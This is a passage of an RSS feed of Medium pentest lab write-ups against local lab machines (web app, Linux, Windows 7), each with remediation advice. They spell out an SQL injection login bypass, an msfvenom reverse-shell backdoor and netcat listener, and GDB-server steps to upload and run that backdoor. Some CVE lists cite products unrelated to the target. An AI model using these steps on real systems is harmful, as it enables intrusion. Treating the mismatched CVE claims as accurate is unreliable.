Restrict Anonymous Access: Configure the SMB server to disallow anonymous access to shares. By enforcing authentication for accessing shared resources, the risk of unauthorized access can be significantly reduced.</p><p>2. Implement Proper Access Controls: Review and strengthen the access controls for each share on the SMB server. Ensure that only authorized users or groups have appropriate access rights to the shared resources.</p><p>3. Regularly Update and Patch: Keep the SMB server and associated software up to date with the latest security patches and updates. This helps to address any known vulnerabilities and protect against potential exploits.</p><p>4. Enable Network-Level Encryption: Enable SMB encryption to ensure the confidentiality and integrity of data transmitted between the SMB server and clients. This helps protect against eavesdropping and unauthorized access to sensitive information.</p><p>5. Implement Network Segmentation: Consider implementing network segmentation to isolate the SMB server from other critical systems or sensitive data. This helps contain any potential compromises and limits the impact of a successful attack.</p><p>References:</p><p>· <a href="https://hacktricks.boitatech.com.br/pentesting/pentesting-smb">https://hacktricks.boitatech.com.br/pentesting/pentesting-smb</a></p><p>· <a href="https://www.hackingarticles.in/password-crackingsmb/">https://www.hackingarticles.in/password-crackingsmb/</a></p><p>· <a href="https://www.cvedetails.com/">https://www.cvedetails.com/</a></p><p>· <a href="https://nvd.nist.gov/vuln">https://nvd.nist.gov/vuln</a></p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pentest — Web Applications]]></title>
            <link>https://medium.com/@ibanezdom96/web-applications-pentest-49aa3dac1e66?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/49aa3dac1e66</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sat, 23 Mar 2024 20:50:51 GMT</pubDate>
            <atom:updated>2024-03-31T02:47:22.183Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5tMrIDIf14OM1MNRSPX9uw.png" /></figure><h3>Executive Summary</h3><p>The purpose of this exercise is to conduct a thorough penetration test on a machine discovered in the production DMZ network.</p><p>The objective is to identify and assess vulnerabilities within the system, which will assist the company in understanding the potential risks associated with the machine and making informed decisions about its security. From this, we will provide recommendations for remediation, aimed at the prompt removal of the vulnerable system.</p><h3>Outline of the scope</h3><p>a. IP Address or Hostname in Scope</p><p>Listener host: 10.0.2.15</p><p>Target: 10.0.2.5</p><p>b. Penetration Test Type</p><p>This operation is a company-sponsored web application penetration test to evaluate the security of their web app. The focus of this testing is on assessing the web application’s vulnerabilities using various methods. The test will be carried out by conducting an Nmap scan, which gathers information about open ports, services, and potential vulnerabilities that may exist.</p><p>Next, a DIRB inquiry is performed to identify any hidden directories and files on the web server that could pose security risks. 
Finally, a SQL injection attack is executed to assess the web application’s susceptibility to this common form of attack.</p><p>By conducting this comprehensive testing, the company aims to identify and address any weaknesses in their web application’s security, ultimately enhancing its resilience against potential threats.</p><h3>Findings</h3><h3>Fingerprinting</h3><p>Fingerprinting is important in the context of penetration testing as it allows for the identification and gathering of information about a target system.</p><p>In the given scenario, the information obtained manually from the service interaction is as follows: The service running on port 80 is identified as Apache httpd version 2.4.53 on CentOS Stream. This indicates the specific version of the web server software in use. The operating system is likely CentOS Stream based on the information about the web server. No explicit misconfigurations or security issues are mentioned, requiring further analysis or additional testing to identify any potential misconfigurations or vulnerabilities within the target system.</p><p>In the following steps we will demonstrate how we can get valuable information that will be useful in the exploitation of the system.</p><ol><li>Open a root terminal on Kali</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YbAOPQcmtJKgPgfkYM2aeA.png" /></figure><p>2. Perform a network scan.</p><p>Use command:<br> &lt;nmap -sn 10.0.2.0/24&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*VMVkIBp7OuSvuB8EPyOCag.png" /></figure><p>Note the IP of the target, in this case:</p><p>Nmap scan report for testbed.webapp.lab (10.0.2.5)</p><p>Host is up (0.00071s latency).</p><p>MAC Address: 08:00:27:73:7D:16 (Oracle VirtualBox virtual NIC)</p><p>3. 
Perform an aggressive scan on the target, in this case:</p><p>&lt;nmap -A 10.0.2.5&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Orqggyh-l4RJ3zkmcMZLJQ.png" /></figure><p>Results:</p><p>Starting Nmap 7.93 ( <a href="https://nmap.org">https://nmap.org</a> ) at 2023-06-13 21:07 EDT</p><p>Nmap scan report for testbed.webapp.lab (10.0.2.5)</p><p>Host is up (0.00085s latency).</p><p>Not shown: 989 filtered tcp ports (no-response), 10 filtered tcp ports (admin-prohibited)</p><p>PORT STATE SERVICE VERSION</p><p>80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))</p><p>|_http-server-header: Apache/2.4.53 (CentOS Stream)</p><p>| http-methods:</p><p>|_ Potentially risky methods: TRACE</p><p>|_http-title: Site doesn't have a title (text/html; charset=UTF-8).</p><p>MAC Address: 08:00:27:73:7D:16 (Oracle VirtualBox virtual NIC)</p><p>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</p><p>Device type: general purpose</p><p>Running: Linux 4.X|5.X</p><p>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5</p><p>OS details: Linux 4.15-5.6, Linux 5.0-5.4</p><p>Network Distance: 1 hop</p><p>TRACEROUTE</p><p>HOP RTT ADDRESS</p><p>1 0.85 ms testbed.webapp.lab (10.0.2.5)</p><p>OS and Service detection performed. Please report any incorrect results at <a href="https://nmap.org/submit/">https://nmap.org/submit/</a> .</p><p>Nmap done: 1 IP address (1 host up) scanned in 18.78 seconds</p><p>Note the open ports, in this case:</p><p>80/tcp open http Apache httpd 2.4.53 ((CentOS Stream))</p><p>Notice specifically that port 80 is indicated, which is typically used for HTTP web traffic. The service running on that port is identified as Apache httpd version 2.4.53, running on CentOS Stream.</p><p>The line “_http-methods: Potentially risky methods: TRACE” suggests that the HTTP server supports the TRACE method. 
The TRACE method is an HTTP request method used for diagnostic purposes, allowing a client to see how a request is handled by the server. It can be considered potentially risky because it may reveal sensitive information or open up vulnerabilities if misused or if the server is misconfigured.</p><h3>Vulnerability Analysis</h3><p>The scenario presents multiple vectors of attack, highlighting the potential vulnerabilities in Apache, Linux, and HTTP. The presence of vulnerabilities in these widely used technologies raises concerns about their overall security. The Linux kernel, if not patched, may suffer from issues already fixed in newer releases. Additionally, the HTTP TRACK &amp; TRACE methods in servers can expose sensitive information. These vulnerabilities serve as a reminder that even widely adopted technologies require diligent security measures to mitigate risks and ensure a safe computing environment.</p><p>There are multiple vectors of attack in this scenario: Apache, Linux, and HTTP.</p><ul><li>The vulnerability associated with the open port 80 (HTTP) on the target machine is related to the Apache httpd server version 2.4.53 running on CentOS Stream.</li><li>The HTTP server does not provide a specific title for the site, and the use of the TRACE HTTP method is considered potentially risky.</li></ul><h3>Vulnerability Description</h3><p>Here is a breakdown featuring some of the vulnerabilities that can be derived from the vectors mentioned in the analysis.</p><p><strong>CVE ID: CVE-2019-6579<br>Score: 9.8<br>Description</strong></p><p>A critical vulnerability in Spectrum Power 4 (with Web Office Portal) allows an unauthenticated attacker with network access to execute system commands with administrative privileges. Exploiting this vulnerability compromises the confidentiality, integrity, or availability of the targeted system. 
No user interaction is required, and no public exploitation has been reported.</p><p><strong>CVE ID: CVE-2022-30522<br>Score: 5.0<br>Description</strong></p><p>In Apache HTTP Server 2.4.53, when mod_sed is used for transformations in contexts with potentially large inputs, excessive memory allocations can occur, leading to an abort.</p><p><strong>CVE ID: CVE-2021-35233<br>Score: 5.3<br>Description</strong></p><p>Kiwi Syslog Server 9.7.1 and earlier enable the HTTP TRACK &amp; TRACE methods, which can disclose sensitive information by responding with the exact HTTP request received. These methods should only be used for diagnostic purposes, but if enabled, they may reveal internal authentication headers added by reverse proxies.</p><p><strong>CVE ID: CVE-2017-1000253<br>Score: 7.2<br>Description</strong></p><p>This Linux kernel vulnerability affects distributions that haven’t patched their long-term kernels. When CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE is enabled and a top-down address allocation strategy is used, a mapping issue occurs with PIE binaries, allowing subsequent PT_LOAD segments to be mapped above the intended address range. Exploiting this vulnerability requires specific kernel configurations and can result in improper memory mappings.</p><p><strong>CVE ID: CVE-2022-0650<br>Score: 8.0<br>Description</strong></p><p>TP-Link TL-WR940N 3.20.1 Build 200316 Rel.34392n (5553) routers are susceptible to arbitrary code execution by network-adjacent attackers. The flaw exists within the httpd service, which fails to properly validate the length of user-supplied data before copying it to a fixed-length stack-based buffer. Successful exploitation allows the attacker to execute code as root. Authentication is required, and the vulnerability is tracked as ZDI-CAN-13993.</p><p>Source: <a href="https://nvd.nist.gov">https://nvd.nist.gov</a></p><h3>Proof of Concept</h3><p>Here we will demonstrate the methods we use for exploitation of the web application.</p><p>1. 
We will now proceed to check whether there are any directories within the target web server. To this end we will use Dirb.</p><p>Dirb is a popular web content scanner and directory brute-forcing tool. It is designed to enumerate directories and files on a web server, helping to identify hidden or vulnerable areas that may be susceptible to unauthorized access or information disclosure.</p><p>Dirb works by sending HTTP requests to the target website and analyzing the server’s response. It leverages a wordlist or dictionary containing potential directory and file names to systematically scan and enumerate web content.</p><p>Set dirb to the target IP:</p><p>&lt;dirb http://10.0.2.5&gt;</p><p>Notice:</p><p>---- Scanning URL: <a href="http://10.0.2.5/">http://10.0.2.5/</a> ----</p><p>+ <a href="http://10.0.2.5/cgi-bin/">http://10.0.2.5/cgi-bin/</a> (CODE:403|SIZE:199)</p><p>+ <a href="http://10.0.2.5/index.html">http://10.0.2.5/index.html</a> (CODE:200|SIZE:456325)</p><p>==&gt; DIRECTORY: <a href="http://10.0.2.5/reminder/">http://10.0.2.5/reminder/</a></p><p>(!) WARNING: Directory IS LISTABLE. No need to scan it.</p><p>(Use mode '-w' if you want to scan it anyway)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*lj8ieK7HKtjSMhkzO_EKzw.png" /></figure><p>2. Dirb showed us the paths to the folders in the WebApp. We shall investigate and explore them in order.</p><p>· <a href="http://10.0.2.5/cgi-bin/">http://10.0.2.5/cgi-bin/</a></p><p>· <a href="http://10.0.2.5/index.html/">http://10.0.2.5/index.html/</a></p><p>· <a href="http://10.0.2.5/reminder/">http://10.0.2.5/reminder/</a></p><p>We will navigate to <a href="http://10.0.2.5/cgi-bin/">http://10.0.2.5/cgi-bin/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*EKTJtXu70oUHt2WhHgp7BQ.png" /></figure><p>This link is a dead end.</p><p>3. 
We will try next to navigate to <a href="http://10.0.2.5/index.html">http://10.0.2.5/index.html</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uLkdwpV_C8ILlVvHVjh-_Q.png" /></figure><p>In this webpage there are several hyperlinks that we can explore:</p><p>· <a href="https://www.centos.org/">https://www.centos.org/</a></p><p>· <a href="http://www.internic.net/whois.html">http://www.internic.net/whois.html</a></p><p>· <a href="http://webapp.lab">http://webapp.lab</a></p><p>For now we don’t have enough information, but these may come in handy later. We shall keep them in mind.</p><p>4. We will navigate to <a href="http://10.0.2.5/reminder/">http://10.0.2.5/reminder/</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*nfoK89qYOvuJH4DrlX1gcQ.png" /></figure><p>Upon examining the contents of the file reminder.txt it is revealed that an app on the testbed vhost is not patched. The admins may have left authentication in place that can be bypassed. This note could be a mistake but regardless, as pentesters we will not overlook information that could lead us to an exploit.</p><p>5. The note specifically mentions an app on the testbed vhost. In this context, an “app” refers to an application or software program that is hosted or deployed on the testbed’s virtual host. A vhost is a virtual server that allows multiple websites or applications to be hosted on the same physical server, each with its own isolated environment.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5lfRxlNU3-x0LJCmxX9lFA.png" /></figure><p>We will try modifying the URL for the webapp, which has already been provided:</p><p>“http://webapp.lab”</p><p>has been modified into</p><p>“http://testbed.webapp.lab”</p><p>6. This URL will lead us to a PHP testing server on a virtual host. 
After clicking on the login button, we are presented with a typical login screen which asks us for credentials.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*NalRkFHv-u0mqkaHOenmKw.png" /></figure><p>If you recall, the reminder that was left for us mentioned that there was a way to bypass authentication.</p><p>For vulnerabilities like that, an SQL injection is known to be an effective method to gain access.</p><p>SQL injection is a type of web application security vulnerability that occurs when an attacker can manipulate the input parameters of a web application to inject malicious SQL (Structured Query Language) code into the application’s database query.</p><p>This is exactly what we will attempt to do.</p><p>7. In this step I will demonstrate how we can use the regex-like properties of an SQL injection attack to bypass authentication.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/480/1*HkKxLa-UOMGLm3wXizfAFQ.png" /></figure><p>The string “admin'or'1'='1” can be used in an SQL injection attack to bypass authentication mechanisms that rely on SQL queries for verifying credentials. The specific behavior and effectiveness of this string would depend on how the authentication logic is implemented in the targeted application.</p><p>input username: admin'or'1'='1</p><p>password can be any string</p><p>Credits: <a href="https://www.youtube.com/watch?v=TSqXkkOt6oM">https://www.youtube.com/watch?v=TSqXkkOt6oM</a></p><p>8. The intention of this query is to find a matching row in the users table where the provided username and password match. However, since the application is vulnerable to SQL injection, we can exploit it by manipulating the input parameters.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hcuFR32AhdwN70ffdnZZAg.png" /></figure><p>In the case of the string “admin'or'1'='1”, we inject additional SQL code to modify the query’s logic. 
The injected portion, 'or'1'='1, is a condition that always evaluates to true, so the query is modified accordingly.</p><p>By injecting this string, we have gained unauthorized access to the application by impersonating the user “admin” or any other account without the password.</p><p>9. Once we have access to the console we can use the ‘find’ command to check if the flag is in the present directory.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*N4L9b0Z_Qg6N9DE6e6XzeQ.png" /></figure><p>10. When we locate the flag it is a simple matter to read its contents:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jHLyidb7kgmHms4U8iIVdQ.png" /></figure><p>11. Enter the command:</p><p>&lt;cat /flag.txt&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KIRmoOAZODBqSXu4xvtW4g.png" /></figure><p><strong>flag.txt: c37c0f63cb584676b9599191ffa91256</strong></p><h3>Recommendations</h3><p><strong>Here are recommendations to mitigate the identified vulnerabilities:</strong></p><p>1. Apache HTTP Server TRACE Method:</p><p>Disable the TRACE HTTP method on the server configuration to prevent potential information disclosure. This can be done by modifying the server’s configuration file (e.g., httpd.conf) and removing or commenting out the “TraceEnable” directive.</p><p>2. Apache HTTP Server Version Disclosure:</p><p>Configure the server to suppress the display of version information in HTTP responses. This can be achieved by setting the “ServerTokens” directive in the server configuration file to the value “Prod” (or “ProductOnly”).</p><p>a. SQL Injection:</p><p>Implement proper input validation and parameterized queries in web application code to mitigate the risk of SQL injection attacks. This involves using prepared statements or parameterized queries instead of dynamically constructing SQL queries with user-supplied input.</p><p>b. 
Cross-Site Scripting (XSS):</p><p>Apply input validation and output encoding techniques to prevent the injection of malicious scripts into web pages. Use security libraries or frameworks that provide built-in protection against XSS vulnerabilities, such as output escaping or content security policies (CSP).</p><p>c. Directory Traversal:</p><p>Implement strict input validation and access controls to prevent directory traversal attacks. Ensure that user-supplied input is validated and sanitized before being used to access files or directories on the server. Implement proper file and directory permissions to restrict unauthorized access.</p><p>d. Remote Code Execution:</p><p>Keep the server’s software and dependencies up to date with the latest security patches to minimize the risk of remote code execution vulnerabilities. Regularly check for updates and apply them promptly. Additionally, follow secure coding practices to minimize the risk of introducing vulnerabilities in custom code.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pentest — Linux]]></title>
            <link>https://medium.com/@ibanezdom96/pentesting-linux-a97d1e00d9ef?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/a97d1e00d9ef</guid>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sun, 03 Dec 2023 05:03:42 GMT</pubDate>
            <atom:updated>2024-03-31T02:51:14.946Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Wt22UEFz5wtMvtxFspumNA.png" /></figure><h3>Executive Summary</h3><h3>· Goals and Timeline</h3><p>a. Purpose:</p><p>As a Pentester for this organization, the purpose of this penetration test is to assess the security posture of the Linux system hosted at IP address 10.0.2.6. My test aims to identify vulnerabilities, weaknesses, and potential entry points that an attacker could exploit. The findings from this test will be reported to the IT director in the hope of assisting in determining the level of risk associated with the system and providing the budget required for updating its posture.</p><p>b. Start and Stop Dates:</p><p>The project started on June 01, 2023 and concluded on June 07, 2023.</p><h3>· Outline of the scope</h3><p>a. IP Address or Hostname in Scope</p><p>· Host Listening Machine: 10.0.2.15</p><p>· Target Machine: 10.0.2.6</p><p>· Target Ports:</p><p>o Port 21 (FTP)</p><p>o Port 3333</p><p>b. Penetration Test Type</p><p>The penetration test employed a combination of active and passive reconnaissance techniques, followed by exploitation using msfvenom on Kali Linux. This approach helps uncover vulnerabilities and potential attack vectors within the target system.</p><h3>Findings</h3><h3>· Fingerprinting.</h3><p>During the penetration test, the following tools and techniques were used to perform fingerprinting and interact with ports 21 and 3333:</p><p>1. Open Kali as root.</p><p>2. Perform a network scan using the command “nmap -sn” on the subnet 10.0.2.0/24.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/982/1*5u9BPnzsoYjUEn7Z7bhE4g.png" /></figure><p>3. Perform an operating system scan on each IP to determine which one is running Linux, as this is likely the target machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/863/1*cSGagJZM2kVGFEXe7RLVsQ.png" /></figure><p>4. 
Perform an aggressive scan on the IP address 10.0.2.6.</p><p>Here are the logged results:</p><blockquote><em>Nmap scan report for 10.0.2.6</em></blockquote><blockquote><em>Host is up (0.00090s latency).</em></blockquote><blockquote><em>Not shown: 987 filtered tcp ports (no-response), 11 filtered tcp ports (admin-prohibited)</em></blockquote><blockquote><em>PORT STATE SERVICE VERSION</em></blockquote><blockquote><em>21/tcp open ftp vsftpd 3.0.3</em></blockquote><blockquote><em>| ftp-anon: Anonymous FTP login allowed (FTP code 230)</em></blockquote><blockquote><em>|_drwxr-xr-x 2 0 0 22 Oct 30 2022 pub</em></blockquote><blockquote><em>| ftp-syst:</em></blockquote><blockquote><em>| STAT:</em></blockquote><blockquote><em>| FTP server status:</em></blockquote><blockquote><em>| Connected to ::ffff:10.0.2.15</em></blockquote><blockquote><em>| Logged in as ftp</em></blockquote><blockquote><em>| TYPE: ASCII</em></blockquote><blockquote><em>| No session bandwidth limit</em></blockquote><blockquote><em>| Session timeout in seconds is 300</em></blockquote><blockquote><em>| Control connection is plain text</em></blockquote><blockquote><em>| Data connections will be plain text</em></blockquote><blockquote><em>| At session startup, client count was 3</em></blockquote><blockquote><em>| vsFTPd 3.0.3 - secure, fast, stable</em></blockquote><blockquote><em>|_End of status</em></blockquote><blockquote><em>3333/tcp open dec-notes?</em></blockquote><blockquote><em>MAC Address: 08:00:27:D5:44:8C (Oracle VirtualBox virtual NIC)</em></blockquote><blockquote><em>Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port</em></blockquote><blockquote><em>Device type: general purpose</em></blockquote><blockquote><em>Running: Linux 4.X|5.X</em></blockquote><blockquote><em>OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5</em></blockquote><blockquote><em>OS details: Linux 4.15-5.6, Linux 5.0-5.4</em></blockquote><blockquote><em>Network 
Distance: 1 hop</em></blockquote><blockquote><em>Service Info: OS: Unix</em></blockquote><blockquote><em>TRACEROUTE</em></blockquote><blockquote><em>HOP RTT ADDRESS</em></blockquote><blockquote><em>1 0.90 ms 10.0.2.6</em></blockquote><p>5. Note the two open ports: port 21 and port 3333.</p><p>6. Starting with port 21, from our aggressive scan of the target machine, we notice the following weakness:</p><blockquote>21/tcp open ftp vsftpd 3.0.3</blockquote><blockquote>| ftp-anon: Anonymous FTP login allowed (FTP code 230)</blockquote><blockquote>|_drwxr-xr-x 2 0 0 22 Oct 30 2022 pub</blockquote><blockquote>| ftp-syst:</blockquote><blockquote>| STAT:</blockquote><blockquote>| FTP server status:</blockquote><blockquote>| Connected to ::ffff:10.0.2.15</blockquote><blockquote>| Logged in as ftp</blockquote><blockquote>| TYPE: ASCII</blockquote><p>It states that it is logged in as FTP. Let’s try accessing the service using the command “&lt;ftp 10.0.2.6&gt;”.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/376/1*U5hCyJjpicUMNeCZhFr_zw.png" /></figure><p>7. Knowing the username, we can try to log in using commonly used passwords.</p><p>The password was ‘ftp’, and we gained access. This serves as a reminder to use stronger authentication when configuring any kind of access.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/338/1*A2-kqJD-fQY_HG5goJovSw.png" /></figure><p>8. Let’s explore the discovered FTP entrance:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/582/1*1yyrbvUzeZP8uvgA41Vzrw.png" /></figure><p>As you can see, we have found an interesting file named “todo.txt”.</p><p>Here is the list of commands I used to read its contents:</p><p>ftp&gt; ls</p><p>ftp&gt; cd pub</p><p>ftp&gt; ls</p><p>ftp&gt; less todo.txt</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/689/1*xuz5otUOAgMCmULbvRdByw.png" /></figure><p>9. The file appears to be a to-do list for the user or admin of this machine. 
It looks like they have left out some important steps in their tasks. They created a GDB server on port 3333 but neglected to restrict access to it. In the proof of concept, we will focus on looking for an exploit that can take advantage of this insecure GDB server. This will demonstrate to the IT director the need for the budget required to replace the vulnerable Linux system.</p><h3>· Vulnerability Analysis</h3><p>Understanding all potential exploitation vectors allows for a more comprehensive risk assessment of your system. By identifying multiple attack paths, you gain a clearer picture of the overall security posture and potential impact of an attack.</p><p><strong>Vulnerability Description Tables</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/642/1*QNwM75xzGPWag4OdXvKjmA.png" /><figcaption>Port 21</figcaption></figure><p>The vulnerabilities associated with port 3333 would depend on the specific service or application running on that port, as it is a generic port number that can be assigned to various services or applications. In this instance it was used as a gdbserver.</p><p><strong>GDBServer</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/645/1*_i3vO7nMrH5dfE-Lf0NlcA.png" /><figcaption>Source: <a href="https://nvd.nist.gov/">https://nvd.nist.gov/</a></figcaption></figure><h3>· Proof of Concept</h3><p>1. A thorough search of the internet and of the course files provided by the professor has led us to discover an exploit that allows the GNU Debugger to connect from another system. Since only the executable to be debugged needs to be resident on the target system, this gives us remote access.</p><p>Credits to @B1n4rySh4d0w</p><p>2. We will need to create an ELF backdoor using msfvenom. 
Execute the following command:</p><p>&lt;msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 PrependFork=true -f elf -o binary.elf&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/881/1*mMdSyfuDFnPxtNaOhoF2Hg.png" /></figure><p>3. Next, we need to modify the permissions of our backdoor file, “binary.elf”:</p><p>&lt;chmod +x binary.elf&gt;</p><p>4. Now, let’s open the backdoor using the GDB service.</p><p>&lt;gdb binary.elf&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*tr6-2TcyybInJ4i3YLm_yw.png" /></figure><p>5. Within GDB, we will set the remote debugger to our target IP and port:</p><p>&lt;target extended-remote 10.0.2.6:3333&gt;</p><p>6. Following that, we will upload the backdoor ELF file using the “put” command:</p><p>&lt;remote put binary.elf /home/binary.elf&gt;</p><p>7. Let’s set the proper directory for the remote executable file:</p><p>&lt;set remote exec-file /home/binary.elf&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/555/1*r-QGg0926WZWzLVdZ_msUw.png" /></figure><p>The illustration below shows the parameters being set:</p><p>8. Before we can execute the “run” command, we need to open a new root terminal and run the command:</p><p>&lt;nc -nlvp 4444&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/965/1*3vGj5hRWe_pLgux2Rb8gwA.png" /></figure><p>This command sets up a listener using the “nc” (netcat) utility on our listening port, 4444.</p><p>9. Finally, execute the reverse shell executable:</p><p>&lt;run&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/999/1*4xZeLVHGLjmKlQdtPdD_SQ.png" /></figure><p>You will notice the output appearing on the other root terminal where the listener is running. We can now interact with our reverse shell.</p><p>Congratulations! You have successfully obtained your reverse shell.</p><p>10. Once inside, we can determine the current directory:</p><p>&lt;pwd&gt;</p><p>11. 
Before proceeding to find the flag, I suggest exploring the system further. You can run commands such as:</p><p>&lt;ls&gt;</p><p>&lt;cd&gt;</p><p>&lt;dir&gt;</p><p>12. Now, let’s hunt down the flag. Change the working directory and gain a broader perspective of the target’s contents:</p><p>&lt;cd&gt;</p><p>&lt;ls&gt;</p><p>There, you will find the flag.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/956/1*H-K6Msj2EQdYv3AOmUds9w.png" /></figure><p>13. Let’s read its contents:</p><p>&lt;cat flag.txt&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/541/1*7gK50nsEa7QqqBbztjzIPg.png" /></figure><p>The data value in the flag.txt file is <strong>b8d4beb98ea6ed32909fcb5afa8dd2f2</strong></p><p>14. If desired, you can retrieve the actual file using the following command:</p><p>&lt;remote get flag.txt /home/kali/Downloads/&gt;</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/999/1*ATDK_j8535QWNTqekiFPvQ.png" /></figure><p>That concludes the tutorial. Happy pentesting!</p><h3>Recommendations</h3><p>1. Patch and Update: Ensure that the target system is running the latest updates and patches for the operating system and any relevant software, including the services associated with ports 21 and 3333.</p><p>2. Disable Unused Services: Disable any unnecessary or unused services running on ports 21 and 3333. If these services are not required for essential functionality, it is best to disable them altogether.</p><p>3. Access Controls and Authentication: Implement strong access controls and enforce proper authentication mechanisms for both ports 21 and 3333.</p><p>4. Firewall and Network Segmentation: Configure a firewall to restrict inbound and outbound traffic to ports 21 and 3333. Only allow necessary connections from trusted sources.</p><p>5. Intrusion Detection and Prevention Systems (IDS/IPS): Deploy an IDS/IPS solution to monitor network traffic and detect any malicious activities targeting ports 21 and 3333. 
Configure the system to generate alerts and take appropriate action upon detecting suspicious or unauthorized behavior.</p><ul><li><strong>END-</strong></li></ul>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Pentest — Windows 7]]></title>
            <link>https://medium.com/@ibanezdom96/windows-7-pentest-b14406e14bf0?source=rss-2e646eb867b1------2</link>
            <guid isPermaLink="false">https://medium.com/p/b14406e14bf0</guid>
            <category><![CDATA[pentesting]]></category>
            <category><![CDATA[cybersecurity]]></category>
            <dc:creator><![CDATA[Dom Ibanez]]></dc:creator>
            <pubDate>Sun, 03 Dec 2023 04:48:32 GMT</pubDate>
            <atom:updated>2024-03-31T02:40:58.195Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/947/1*Jf0OXtMahcowv4ceUAiOSg.png" /></figure><p>Executive Summary</p><p>Goals and Timeline</p><p>• Purpose:</p><p>This penetration test was conducted to assess the security vulnerabilities present in a Windows 7 Enterprise system installed on the company’s network. The goal of the test was to demonstrate the risks and potential consequences of using an outdated operating system and to highlight the importance of upgrading to a more secure and supported version. The project started on May 25, 2023, and concluded on May 31, 2023.</p><p>• Start and Stop Dates:</p><p>The project started on May 25, 2023, and concluded on May 31, 2023.</p><p>Outline of the scope</p><p>• IP Address or Hostname in Scope</p><p>The scope of the project includes the penetration testing of two systems: the Kali Linux machine (10.0.2.15) and the target Windows 7 Enterprise machine (10.0.2.4). The purpose of the penetration test is to identify vulnerabilities, exploit them, and demonstrate the potential impact of these vulnerabilities on the target system’s security.</p><p>• Penetration Test Type</p><p>The penetration test conducted in this project is a network penetration test. It focuses on assessing the security of the network infrastructure by identifying vulnerabilities in the systems and services running on the network. The primary objective is to evaluate the target Windows 7 Enterprise machine’s security posture and highlight the risks associated with using an unsupported operating system.</p><p>By conducting this penetration test, the team aimed to provide concrete evidence of the vulnerabilities and risks associated with running Windows 7 Enterprise. This would enable the organization to make informed decisions about the urgency and importance of upgrading to a more secure and supported operating system. 
The penetration test findings will serve as a basis for recommending appropriate remediation measures to enhance the overall security posture of the organization.</p><p>Findings</p><p>Fingerprinting.</p><p>By doing a network scan, we discover several hosts up on the network.</p><p>To disable port scanning in Nmap, we can use the -sn flag. This flag tells Nmap to skip the port scanning phase and focus solely on host discovery. By using this flag, Nmap will only determine which hosts are up without performing any port scanning.</p><p>• 10.0.2.3</p><p>• 10.0.2.4</p><p>• 10.0.2.3</p><p>With only three addresses, we won’t have to go through too many to find our target. After this we can run an OS scan on each host using the &lt;nmap -O&gt; command.</p><p>This will tell us which host is running Windows 7.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*f1FCX6PE0V89L5plexjWCg.png" /></figure><p>The host with address 10.0.2.4 is our target.</p><p>Once we’ve found our target, we’ll want to conduct an open port scan of all 65535 ports against the target system to understand what services exist that we’ll be able to interact with.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/547/1*3bq5JtBp-91CSkqHJ5c2sg.png" /></figure><p>Now that we know which ports are open, you’ll want to use a more intrusive scan.</p><p>Run &lt;sudo nmap -A 10.0.2.4&gt;</p><p>Here are the results:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WQwB_xso297wmtbqcj1cKw.png" /></figure><p>To make this information easier to digest, I have created tables.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/747/1*OPcxMSDfMi_l7rdTKdawHA.png" /><figcaption>Port Scan Results</figcaption></figure><p>The target operating system is a Microsoft Windows 7 Ultimate 7601 Service Pack 1.</p><p>In an attempt to access RPC without a username and password, I used the RPC client on Kali. 
